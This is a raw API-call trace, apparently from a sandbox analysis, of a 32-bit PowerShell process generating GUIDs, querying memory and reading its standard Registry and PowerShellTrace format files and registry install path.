	[0225.609] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x18a9ef55, Data2=0x1268, Data3=0x4db5, Data4=([0]=0x87, [1]=0xb7, [2]=0x83, [3]=0xac, [4]=0x8d, [5]=0x90, [6]=0x5d, [7]=0x3))) returned 0x0
	[0225.609] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x4b34ea35, Data2=0x237c, Data3=0x4e64, Data4=([0]=0xb5, [1]=0xf, [2]=0x39, [3]=0x6e, [4]=0x8c, [5]=0xec, [6]=0x16, [7]=0x48))) returned 0x0
	[0225.610] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x41a9d51a, Data2=0xddbd, Data3=0x4bd5, Data4=([0]=0x8c, [1]=0x7c, [2]=0x38, [3]=0xf1, [4]=0x6e, [5]=0xad, [6]=0x57, [7]=0x5d))) returned 0x0
	[0225.610] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x4c1f6146, Data2=0x4a01, Data3=0x44e1, Data4=([0]=0xa9, [1]=0x27, [2]=0x3f, [3]=0xd8, [4]=0xae, [5]=0x54, [6]=0xe4, [7]=0xcb))) returned 0x0
	[0225.610] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xac57303a, Data2=0x90fc, Data3=0x4022, Data4=([0]=0x94, [1]=0x9c, [2]=0x24, [3]=0x2a, [4]=0xfb, [5]=0x60, [6]=0xeb, [7]=0xd3))) returned 0x0
	[0225.610] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xccfd248d, Data2=0x2c71, Data3=0x4f4f, Data4=([0]=0xb0, [1]=0x20, [2]=0xcb, [3]=0xcf, [4]=0x9a, [5]=0x56, [6]=0x52, [7]=0x26))) returned 0x0
	[0225.611] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x863a532d, Data2=0x443a, Data3=0x4d17, Data4=([0]=0xaa, [1]=0x14, [2]=0x85, [3]=0x9, [4]=0x91, [5]=0x46, [6]=0x5f, [7]=0x99))) returned 0x0
	[0225.611] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xc2f4954e, Data2=0xe0bb, Data3=0x445f, Data4=([0]=0xb4, [1]=0x79, [2]=0x82, [3]=0x83, [4]=0x4d, [5]=0x9c, [6]=0x4c, [7]=0xc1))) returned 0x0
	[0225.611] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xedf93ae4, Data2=0x130, Data3=0x4e00, Data4=([0]=0x88, [1]=0xd2, [2]=0x95, [3]=0x6d, [4]=0xbd, [5]=0x97, [6]=0x87, [7]=0x2c))) returned 0x0
	[0225.612] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x3ed07d9b, Data2=0xbccd, Data3=0x4d92, Data4=([0]=0x80, [1]=0xd2, [2]=0x1b, [3]=0x96, [4]=0x66, [5]=0x37, [6]=0x4d, [7]=0x95))) returned 0x0
	[0225.613] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xc561c5d2, Data2=0x604f, Data3=0x4dc0, Data4=([0]=0x93, [1]=0x85, [2]=0x9e, [3]=0xda, [4]=0x7d, [5]=0xdf, [6]=0x5b, [7]=0xcd))) returned 0x0
	[0225.613] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x3c74bc7e, Data2=0x8b36, Data3=0x4e64, Data4=([0]=0x99, [1]=0x6, [2]=0x54, [3]=0x7b, [4]=0x15, [5]=0xd9, [6]=0x43, [7]=0x28))) returned 0x0
	[0225.613] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x54c3b0ba, Data2=0xbf73, Data3=0x4e0c, Data4=([0]=0x9c, [1]=0x3f, [2]=0xf9, [3]=0x75, [4]=0xaa, [5]=0x8b, [6]=0x3f, [7]=0x5d))) returned 0x0
	[0225.614] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x176081d3, Data2=0x1cf1, Data3=0x4e38, Data4=([0]=0xad, [1]=0xcf, [2]=0x27, [3]=0x70, [4]=0x56, [5]=0x53, [6]=0x3, [7]=0xf6))) returned 0x0
	[0225.614] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x23817672, Data2=0xb222, Data3=0x47f5, Data4=([0]=0x9a, [1]=0x28, [2]=0x14, [3]=0x53, [4]=0x5a, [5]=0xd7, [6]=0x68, [7]=0xf9))) returned 0x0
	[0225.614] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xb99c60a9, Data2=0x17f3, Data3=0x41f7, Data4=([0]=0x84, [1]=0xb8, [2]=0x11, [3]=0x1d, [4]=0x90, [5]=0x39, [6]=0x5f, [7]=0xa9))) returned 0x0
	[0225.615] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x24f1d60a, Data2=0xe17d, Data3=0x4ca1, Data4=([0]=0xae, [1]=0xa0, [2]=0xf8, [3]=0xbe, [4]=0xcf, [5]=0x51, [6]=0x44, [7]=0xb3))) returned 0x0
	[0225.615] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xf5f0804e, Data2=0x14ba, Data3=0x4c48, Data4=([0]=0xac, [1]=0xb8, [2]=0x81, [3]=0xe, [4]=0x88, [5]=0xc7, [6]=0xc7, [7]=0x69))) returned 0x0
	[0225.615] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xa8819165, Data2=0xe9a1, Data3=0x4fa5, Data4=([0]=0x94, [1]=0xe7, [2]=0x1f, [3]=0x5, [4]=0xde, [5]=0x80, [6]=0x5d, [7]=0xc8))) returned 0x0
	[0225.615] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x695ca9fe, Data2=0x9707, Data3=0x44d1, Data4=([0]=0x85, [1]=0xe8, [2]=0x29, [3]=0x2e, [4]=0x58, [5]=0xc0, [6]=0xb2, [7]=0xad))) returned 0x0
	[0225.615] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xb5893b50, Data2=0xfa81, Data3=0x4099, Data4=([0]=0xb3, [1]=0xdb, [2]=0xb9, [3]=0xd1, [4]=0x6b, [5]=0x47, [6]=0x6a, [7]=0x54))) returned 0x0
	[0225.615] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xd4ba560, Data2=0x8d4a, Data3=0x46fb, Data4=([0]=0xb9, [1]=0x66, [2]=0x50, [3]=0x6d, [4]=0x27, [5]=0x2e, [6]=0x24, [7]=0xc5))) returned 0x0
	[0225.616] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xca20e6cf, Data2=0x7a1e, Data3=0x4961, Data4=([0]=0xb6, [1]=0x6f, [2]=0xd6, [3]=0xa8, [4]=0x89, [5]=0x14, [6]=0x8e, [7]=0x9a))) returned 0x0
	[0225.616] VirtualQuery (in: lpAddress=0xad700, lpBuffer=0xae700, dwLength=0x1c | out: lpBuffer=0xae700*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.616] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x666a10f2, Data2=0x175a, Data3=0x4c6e, Data4=([0]=0x93, [1]=0x86, [2]=0x4, [3]=0x43, [4]=0x63, [5]=0x5c, [6]=0x8, [7]=0xb0))) returned 0x0
	[0225.616] VirtualQuery (in: lpAddress=0xad700, lpBuffer=0xae700, dwLength=0x1c | out: lpBuffer=0xae700*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.620] VirtualQuery (in: lpAddress=0xad700, lpBuffer=0xae700, dwLength=0x1c | out: lpBuffer=0xae700*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.625] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x3afd628, Data2=0x992f, Data3=0x4a86, Data4=([0]=0xab, [1]=0x74, [2]=0xb7, [3]=0x94, [4]=0x8a, [5]=0xac, [6]=0x19, [7]=0x69))) returned 0x0
	[0225.625] VirtualQuery (in: lpAddress=0xad700, lpBuffer=0xae700, dwLength=0x1c | out: lpBuffer=0xae700*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.625] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x2363b42d, Data2=0x70c8, Data3=0x417f, Data4=([0]=0x8d, [1]=0xe0, [2]=0x23, [3]=0xf5, [4]=0xef, [5]=0x6b, [6]=0x26, [7]=0x44))) returned 0x0
	[0225.626] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xf481011, Data2=0xf197, Data3=0x49a6, Data4=([0]=0xb3, [1]=0x1d, [2]=0x2c, [3]=0x7a, [4]=0x4d, [5]=0x17, [6]=0x42, [7]=0x78))) returned 0x0
	[0225.626] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x52fb8653, Data2=0xdbec, Data3=0x40c5, Data4=([0]=0x8a, [1]=0xe2, [2]=0xa6, [3]=0x72, [4]=0x8d, [5]=0x94, [6]=0xb9, [7]=0x3d))) returned 0x0
	[0225.626] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x2f6482b6, Data2=0xf337, Data3=0x4447, Data4=([0]=0x91, [1]=0x80, [2]=0x22, [3]=0x92, [4]=0xf0, [5]=0x61, [6]=0x5f, [7]=0x6d))) returned 0x0
	[0225.626] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xd4a8b38b, Data2=0x4bd, Data3=0x4c98, Data4=([0]=0x84, [1]=0x29, [2]=0x9d, [3]=0x1f, [4]=0x77, [5]=0x81, [6]=0xf3, [7]=0xcf))) returned 0x0
	[0225.627] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x4dd36ceb, Data2=0xf111, Data3=0x4a73, Data4=([0]=0x87, [1]=0xb3, [2]=0x5b, [3]=0x8d, [4]=0x59, [5]=0xe5, [6]=0xda, [7]=0xd8))) returned 0x0
	[0225.627] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x243038d8, Data2=0xede6, Data3=0x4195, Data4=([0]=0x96, [1]=0xed, [2]=0x79, [3]=0x54, [4]=0x6f, [5]=0x87, [6]=0x76, [7]=0x29))) returned 0x0
	[0225.627] VirtualQuery (in: lpAddress=0xad6e0, lpBuffer=0xae6e0, dwLength=0x1c | out: lpBuffer=0xae6e0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.628] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xb5142527, Data2=0x5e13, Data3=0x4a75, Data4=([0]=0xb6, [1]=0xb7, [2]=0x4b, [3]=0x37, [4]=0x92, [5]=0xab, [6]=0x9a, [7]=0x59))) returned 0x0
	[0225.628] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x8a21d2e9, Data2=0xddde, Data3=0x4402, Data4=([0]=0xb4, [1]=0x22, [2]=0x10, [3]=0x25, [4]=0x54, [5]=0x5d, [6]=0xd0, [7]=0x7f))) returned 0x0
	[0225.628] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x89be1057, Data2=0x3004, Data3=0x486c, Data4=([0]=0x83, [1]=0x76, [2]=0x2a, [3]=0x43, [4]=0x40, [5]=0x56, [6]=0x97, [7]=0xdd))) returned 0x0
	[0225.629] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x3f1aaf2a, Data2=0xa28c, Data3=0x485f, Data4=([0]=0x80, [1]=0x46, [2]=0x4, [3]=0x42, [4]=0x4f, [5]=0xbf, [6]=0x7f, [7]=0xa9))) returned 0x0
	[0225.629] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xf5bc9495, Data2=0xe236, Data3=0x46ff, Data4=([0]=0x91, [1]=0x9c, [2]=0x9e, [3]=0xed, [4]=0x57, [5]=0xd4, [6]=0xb1, [7]=0xa8))) returned 0x0
	[0225.629] VirtualQuery (in: lpAddress=0xad6e0, lpBuffer=0xae6e0, dwLength=0x1c | out: lpBuffer=0xae6e0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.629] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xe7441e42, Data2=0x6cb, Data3=0x4ff6, Data4=([0]=0xb0, [1]=0xb3, [2]=0x93, [3]=0xf0, [4]=0x5c, [5]=0x87, [6]=0xb4, [7]=0xdc))) returned 0x0
	[0225.629] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x33cb1046, Data2=0x260a, Data3=0x4c4a, Data4=([0]=0xa7, [1]=0x12, [2]=0x5, [3]=0x9d, [4]=0x77, [5]=0xa8, [6]=0xb8, [7]=0xcd))) returned 0x0
	[0225.629] VirtualQuery (in: lpAddress=0xad708, lpBuffer=0xae708, dwLength=0x1c | out: lpBuffer=0xae708*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.630] VirtualQuery (in: lpAddress=0xad708, lpBuffer=0xae708, dwLength=0x1c | out: lpBuffer=0xae708*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.630] VirtualQuery (in: lpAddress=0xad708, lpBuffer=0xae708, dwLength=0x1c | out: lpBuffer=0xae708*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.630] VirtualQuery (in: lpAddress=0xad708, lpBuffer=0xae708, dwLength=0x1c | out: lpBuffer=0xae708*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0225.630] GetLastError () returned 0x0
	[0225.631] SetErrorMode (uMode=0x1) returned 0x1
	[0225.631] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x358
	[0225.631] GetLastError () returned 0x0
	[0225.631] GetFileType (hFile=0x358) returned 0x1
	[0225.631] SetErrorMode (uMode=0x1) returned 0x1
	[0225.631] GetFileType (hFile=0x358) returned 0x1
	[0225.631] ReadFile (in: hFile=0x358, lpBuffer=0x3176cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x3176cbc*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.632] GetLastError () returned 0x0
	[0225.632] ReadFile (in: hFile=0x358, lpBuffer=0x3176cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x3176cbc*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.633] GetLastError () returned 0x0
	[0225.633] ReadFile (in: hFile=0x358, lpBuffer=0x3176cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x3176cbc*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.633] GetLastError () returned 0x0
	[0225.633] ReadFile (in: hFile=0x358, lpBuffer=0x3176cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x3176cbc*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.633] GetLastError () returned 0x0
	[0225.635] ReadFile (in: hFile=0x358, lpBuffer=0x3176cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x3176cbc*, lpNumberOfBytesRead=0xae9b4*=0x8b4, lpOverlapped=0x0) returned 1
	[0225.635] GetLastError () returned 0x0
	[0225.635] ReadFile (in: hFile=0x358, lpBuffer=0x3176110, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x3176110*, lpNumberOfBytesRead=0xae9b4*=0x0, lpOverlapped=0x0) returned 1
	[0225.635] GetLastError () returned 0x0
	[0225.635] ReadFile (in: hFile=0x358, lpBuffer=0x3176cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x3176cbc*, lpNumberOfBytesRead=0xae9b4*=0x0, lpOverlapped=0x0) returned 1
	[0225.635] GetLastError () returned 0x0
	[0225.635] CloseHandle (hObject=0x358) returned 1
	[0225.635] GetLastError () returned 0x0
	[0225.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae514, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0225.635] GetLastError () returned 0x0
	[0225.635] SetErrorMode (uMode=0x1) returned 0x1
	[0225.635] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x3197cb8 | out: lpFileInformation=0x3197cb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0225.636] GetLastError () returned 0x0
	[0225.636] SetErrorMode (uMode=0x1) returned 0x1
	[0225.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0225.636] GetLastError () returned 0x0
	[0225.636] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae938 | out: phkResult=0xae938*=0x358) returned 0x0
	[0225.636] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae980, lpData=0x0, lpcbData=0xae97c*=0x0 | out: lpType=0xae980*=0x1, lpData=0x0, lpcbData=0xae97c*=0x56) returned 0x0
	[0225.636] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae980, lpData=0x3582a0, lpcbData=0xae97c*=0x56 | out: lpType=0xae980*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae97c*=0x56) returned 0x0
	[0225.636] RegCloseKey (hKey=0x358) returned 0x0
	[0225.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0225.637] GetLastError () returned 0x0
	[0225.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0225.637] GetLastError () returned 0x0
	[0225.638] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xe9eea6a4, Data2=0x5b8f, Data3=0x4d26, Data4=([0]=0x90, [1]=0x2c, [2]=0xa6, [3]=0xee, [4]=0xfa, [5]=0xf1, [6]=0xd0, [7]=0x83))) returned 0x0
	[0225.638] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xda0c511a, Data2=0x2d2b, Data3=0x4b50, Data4=([0]=0xac, [1]=0xfb, [2]=0x32, [3]=0x6f, [4]=0x84, [5]=0xa7, [6]=0x6, [7]=0xcd))) returned 0x0
	[0225.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0225.638] GetLastError () returned 0x0
	[0225.638] SetErrorMode (uMode=0x1) returned 0x1
	[0225.638] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x358
	[0225.638] GetLastError () returned 0x0
	[0225.639] GetFileType (hFile=0x358) returned 0x1
	[0225.639] SetErrorMode (uMode=0x1) returned 0x1
	[0225.639] GetFileType (hFile=0x358) returned 0x1
	[0225.639] ReadFile (in: hFile=0x358, lpBuffer=0x31adbc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x31adbc8*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.707] GetLastError () returned 0x0
	[0225.708] ReadFile (in: hFile=0x358, lpBuffer=0x31adbc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x31adbc8*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.708] GetLastError () returned 0x0
	[0225.709] ReadFile (in: hFile=0x358, lpBuffer=0x31adbc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x31adbc8*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.709] GetLastError () returned 0x0
	[0225.709] ReadFile (in: hFile=0x358, lpBuffer=0x31adbc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x31adbc8*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.709] GetLastError () returned 0x0
	[0225.710] ReadFile (in: hFile=0x358, lpBuffer=0x31adbc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x31adbc8*, lpNumberOfBytesRead=0xae9b4*=0xe98, lpOverlapped=0x0) returned 1
	[0225.710] GetLastError () returned 0x0
	[0225.710] ReadFile (in: hFile=0x358, lpBuffer=0x31ad200, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x31ad200*, lpNumberOfBytesRead=0xae9b4*=0x0, lpOverlapped=0x0) returned 1
	[0225.710] GetLastError () returned 0x0
	[0225.710] ReadFile (in: hFile=0x358, lpBuffer=0x31adbc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x31adbc8*, lpNumberOfBytesRead=0xae9b4*=0x0, lpOverlapped=0x0) returned 1
	[0225.710] GetLastError () returned 0x0
	[0225.710] CloseHandle (hObject=0x358) returned 1
	[0225.749] GetLastError () returned 0x0
	[0225.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae514, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0225.749] GetLastError () returned 0x0
	[0225.749] SetErrorMode (uMode=0x1) returned 0x1
	[0225.749] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x31cebc4 | out: lpFileInformation=0x31cebc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0225.749] GetLastError () returned 0x0
	[0225.749] SetErrorMode (uMode=0x1) returned 0x1
	[0225.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0225.750] GetLastError () returned 0x0
	[0225.750] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae938 | out: phkResult=0xae938*=0x358) returned 0x0
	[0225.750] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae980, lpData=0x0, lpcbData=0xae97c*=0x0 | out: lpType=0xae980*=0x1, lpData=0x0, lpcbData=0xae97c*=0x56) returned 0x0
	[0225.750] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae980, lpData=0x3582a0, lpcbData=0xae97c*=0x56 | out: lpType=0xae980*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae97c*=0x56) returned 0x0
	[0225.750] RegCloseKey (hKey=0x358) returned 0x0
	[0225.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0225.750] GetLastError () returned 0x0
	[0225.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0225.750] GetLastError () returned 0x0
